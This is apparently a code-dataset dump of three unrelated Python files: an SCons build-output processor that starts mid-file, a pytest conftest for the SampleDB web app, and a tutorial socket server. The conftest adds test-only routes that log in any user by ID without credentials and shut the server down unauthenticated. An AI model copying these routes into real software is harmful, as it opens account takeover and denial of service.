env['SPAWN'] = output_processor.windows_spawn
else:
env['SPAWN'] = output_processor.posix_spawn
def posix_spawn( self, sh, escape, cmd, args, env ):
processor = SpawnedProcessor( self.scons_env )
returncode = IncrementalSubProcess.Popen(
processor,
[ arg.strip('"') for arg in args ],
env=env,
suppress_output=True,
)
summary = processor.summary( returncode )
if summary:
print( summary )
return returncode
def windows_spawn( self, sh, escape, cmd, args, env ):
processor = SpawnedProcessor( self.scons_env )
stdout = Stream( processor, "stdout" )
stderr = Stream( processor, "stderr" )
pspawn = PSpawn( _pspawn, sh, escape, cmd, args, env, stdout, stderr )
pspawn_thread = threading.Thread( target=pspawn )
finished = threading.Event()
pspawn_thread.start()
stdout_thread = threading.Thread( target = Reader( stdout, finished ) )
stdout_thread.start()
stderr_thread = threading.Thread( target = Reader( stderr, finished ) )
stderr_thread.start()
pspawn_thread.join()
logger.trace( "Processor - PSPAWN joined" )
finished.set()
stdout.join()
logger.trace( "Processor - STDOUT stream joined" )
stdout_thread.join()
logger.trace( "Processor - STDOUT thread joined" )
stderr.join()
logger.trace( "Processor - STDERR stream joined" )
stderr_thread.join()
logger.trace( "Processor - STDERR thread joined" )
returncode = pspawn.returncode()
summary = processor.summary( returncode )
if summary:
print( summary )
return returncode
class SpawnedProcessor(object):
def __init__( self, scons_env ):
self._processor = ToolchainProcessor(
scons_env['toolchain'],
scons_env['minimal_output'],
scons_env['ignore_duplicates'] )
def __call__( self, line ):
return self._processor( line )
def summary( self, returncode ):
return self._processor.summary( returncode )
class ToolchainProcessor:
def __init__( self, toolchain, minimal_output, ignore_duplicates ):
self.toolchain = toolchain
self.minimal_output = minimal_output
self.ignore_duplicates = ignore_duplicates
self.errors = 0
self.warnings = 0
self.start_time = time.time()
self.error_messages = {}
self.warning_messages = {}
self.ignore_current_message = False
def filtered_duplicate( self, line, existing_messages ):
if self.ignore_duplicates and line in existing_messages:
existing_messages[line] +=1
self.ignore_current_message = True
return None
else:
self.ignore_current_message = False
existing_messages[line] = 1
return line
def filtered_line( self, line=None, meaning=None ):
if meaning == "error":
return self.filtered_duplicate( line, self.error_messages )
if meaning == "warning":
return self.filtered_duplicate( line, self.warning_messages )
if self.minimal_output or self.ignore_current_message:
return None
else:
return line
def __call__( self, line ):
( matches, interpretor, error_id, warning_id ) = self.interpret( line )
if matches:
highlights = interpretor['highlight']
display = interpretor['display']
meaning = interpretor['meaning']
file = interpretor['file']
message = ''
for match in display:
element = matches.group( match )
if match == file and ( meaning == 'error' or meaning == 'warning' ):
element = self.normalise_path( element )
element = as_colour( meaning, element )
if match in highlights:
element = as_emphasised( element )
message += element
message = self.filtered_line( message + "\n", meaning )
if meaning == 'error':
if message:
message = as_highlighted( meaning, " = Error " + str(error_id) + " = ") + "\n" + message
else:
self.errors -= 1
elif meaning == 'warning':
if message:
message = as_highlighted( meaning, " = Warning " + str(warning_id) + " = ") + "\n" + message
else:
self.warnings -= 1
return message
return self.filtered_line( line )
def normalise_path( self, file_path ):
normalised_path = file_path
if os.path.exists( file_path ):
normalised_path = os.path.relpath( os.path.realpath( file_path ) )
# if normalised_path[0] != '.' and normalised_path[0] != os.path.sep:
# normalised_path = '.' + os.path.sep + normalised_path
# return os.path.abspath( normalised_path )
return normalised_path
def interpret( self, line ):
Interpretors = self.toolchain.output_interpretors()
for interpretor in Interpretors:
Regex = interpretor['regex']
Matches = re.match( Regex, line )
if Matches:
error_id = 0
warning_id = 0
if interpretor['meaning'] == 'error':
self.errors += 1
error_id = self.errors
elif interpretor['meaning'] == 'warning':
self.warnings += 1
warning_id = self.warnings
return ( Matches, interpretor, error_id, warning_id, )
return ( None, None, None, None, )
def summary( self, returncode ):
elapsed_time = time.time() - self.start_time
Summary = ''
if returncode:
Summary += as_highlighted( 'summary', " === Process Terminated with status " + str(returncode) + " (Elapsed " + str(elapsed_time) + "s)" + " === ") + "\n"
if self.errors:
Summary += as_highlighted( 'error', " === Errors " + str(self.errors) + " === ")
if self.warnings:
Summary += as_highlighted( 'warning', " === Warnings " + str(self.warnings) + " === ")
return Summary
|
conftest.py
|
# coding: utf-8
"""
"""
import getpass
import copy
import logging
import os
import random
import threading
import time
import cherrypy
import flask
import flask_login
import pytest
import requests
import sqlalchemy
import sampledb
import sampledb.utils
import sampledb.config
sampledb.config.MAIL_SUPPRESS_SEND = True
sampledb.config.TEMPLATES_AUTO_RELOAD = True
sampledb.config.SQLALCHEMY_DATABASE_URI = 'postgresql+psycopg2://{0}:@localhost:5432/{0}'.format(getpass.getuser())
sampledb.config.MAIL_SENDER = 'sampledb@example.com'
sampledb.config.MAIL_SERVER = 'mail.example.com'
sampledb.config.CONTACT_EMAIL = 'sampledb@example.com'
sampledb.config.JUPYTERHUB_URL = 'example.com'
sampledb.config.LDAP_NAME = 'LDAP'
sampledb.config.TESTING_LDAP_UNKNOWN_LOGIN = 'unknown-login-for-sampledb-tests'
sampledb.config.TESTING_LDAP_WRONG_PASSWORD = 'wrong-password-for-sampledb-tests'
sampledb.config.FEDERATION_UUID = 'aef05dbb-2763-49d1-964d-71205d8da0bf'
# restore possibly overridden configuration data from environment variables
sampledb.config.use_environment_configuration(env_prefix='SAMPLEDB_')
def create_flask_server(app):
if not getattr(app, 'has_shutdown_route', False):
@app.route('/shutdown', methods=['POST'])
def shutdown():
cherrypy.engine.exit()
return 'Server shutting down...'
app.has_shutdown_route = True
def run_server():
cherrypy.engine.start()
cherrypy.engine.block()
app.debug = True
port = random.randint(10000, 20000)
cherrypy.tree.graft(app, '/')
cherrypy.config.update({
'environment': 'test_suite',
'server.socket_host': '127.0.0.1',
'server.socket_port': port,
'server.socket_queue_size': 20,
'log.screen': True
})
server_thread = threading.Thread(target=run_server, daemon=True)
server_thread.start()
server_thread.app = app
server_thread.initial_config = copy.deepcopy(server_thread.app.config)
server_thread.base_url = 'http://localhost:{0}/'.format(port)
server_thread.api_url = server_thread.base_url + 'api/'
# short delay to allow the web server to start
time.sleep(0.1)
yield server_thread
# restore initial configuration
server_thread.app.config = server_thread.initial_config
r = requests.post(server_thread.base_url + 'shutdown')
assert r.status_code == 200
server_thread.join()
@pytest.fixture(scope='session')
def flask_server(worker_id):
if worker_id != 'master':
sampledb.config.SQLALCHEMY_DATABASE_URI = "postgresql+psycopg2://postgres:@postgres:5432/testdb_" + worker_id[2:]
sampledb.config.FILE_STORAGE_PATH = sampledb.config.FILE_STORAGE_PATH + worker_id[2:] + '/'
app = create_app()
# empty the database first, to ensure all tests rebuild it before use
if worker_id != 'master':
sampledb.utils.empty_database(sqlalchemy.create_engine(sampledb.config.SQLALCHEMY_DATABASE_URI), only_delete=True)
else:
sampledb.utils.empty_database(sqlalchemy.create_engine(sampledb.config.SQLALCHEMY_DATABASE_URI), only_delete=False)
yield from create_flask_server(app)
def create_app():
logging.getLogger('flask.app').setLevel(logging.WARNING)
os.environ['FLASK_ENV'] = 'development'
sampledb.utils.empty_database(sqlalchemy.create_engine(sampledb.config.SQLALCHEMY_DATABASE_URI), only_delete=True)
sampledb_app = sampledb.create_app()
sampledb_app.config['TESTING'] = True
@sampledb_app.route('/users/me/loginstatus')
def check_login():
return flask.jsonify(flask_login.current_user.is_authenticated)
@sampledb_app.route('/users/<int:user_id>/autologin')
def autologin(user_id):
user = sampledb.models.User.query.get(user_id)
assert user is not None
flask_login.login_user(user)
return ''
return sampledb_app
@pytest.fixture
def app(flask_server):
app = flask_server.app
# reset config and database before each test
app.config = copy.deepcopy(flask_server.initial_config)
sampledb.utils.empty_database(sqlalchemy.create_engine(sampledb.config.SQLALCHEMY_DATABASE_URI), only_delete=True)
sampledb.setup_database(app)
# enable german language for input by default during testing
with app.app_context():
german = sampledb.logic.languages.get_language_by_lang_code('de')
sampledb.logic.languages.update_language(
language_id=german.id,
names=german.names,
lang_code=german.lang_code,
datetime_format_datetime=german.datetime_format_datetime,
datetime_format_moment=german.datetime_format_moment,
enabled_for_input=True,
enabled_for_user_interface=german.enabled_for_user_interface
)
return app
@pytest.fixture(autouse=True)
def app_context(app):
with app.app_context():
# yield to keep the app context active until the test is done
yield None
|
server.py
|
#!/usr/bin/env python3
#
# https://docs.python.org/3.5/library/socket.html
#
import socket
import threading
import time
# --- constants ---
HOST = '' # local address IP (not external address IP)
# '0.0.0.0' or '' - conection on all NICs (Network Interface Card),
# '127.0.0.1' or 'localhost' - local conection only (can't connect from remote computer)
# 'local_IP' - connection only on one NIC which has this IP
PORT = 8000 # local port (not external port)
# --- functions ---
def handle_client(conn, addr):
try:
while True:
# --- receive/send data ---
# if client first `send()` and next `recv()`
# then server have to first `recv`() and next `send()`
# if both will `recv()` at the same time then all will hang
# because both will wait for data and nobody will `send()`
# if you don't use native characters
# then you can use 'ascii' instead of 'utf-8'
now = int(time.time())
# receiving
data = conn.recv(1024)
text = data.decode('utf-8') # decode bytes to string
print('[{}][{}] recv: {}'.format(addr, now, text))
# sending
text = 'Thank you [{}]'.format(now)
data = text.encode('utf-8') # encode string to bytes
conn.send(data)
print('[{}]][{}] send: {}'.format(addr, now, text))
except Exception as e:
print('[DEBUG] exception:', e)
# --- create socket ---
print('[DEBUG] create socket')
#s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s = socket.socket() # default value is (socket.AF_INET, socket.SOCK_STREAM)
# so you don't have to use it in socket()
# --- options ---
print('[DEBUG] set options')
# solution for "[Error 89] Address already in use". Use before bind()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# --- assign socket to local IP (local NIC) ---
print('[DEBUG] bind:', (HOST, PORT))
s.bind((HOST, PORT)) # one tuple (HOST, PORT), not two arguments
# --- set size of queue ---
print('[DEBUG] listen')
s.listen(1) # number of clients waiting in queue for "accept".
# If queue is full then client can't connect.
while True:
# --- accept client ---
# accept client and create new socket `conn` (with different port) for this client only
# and server will can use `s` to accept other clients (if you will use threading)
print('[DEBUG] accept ... waiting')
conn, addr = s.accept()
print('[DEBUG] addr:', addr)
# --- run thread ---
t = threading.Thread(target=handle_client, args=(conn, addr))
t.start()
# --- close all sockets ---
# alway first close `conn`, next close `s`
print('[DEBUG] close socket(s)')
conn.close()
s.close()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.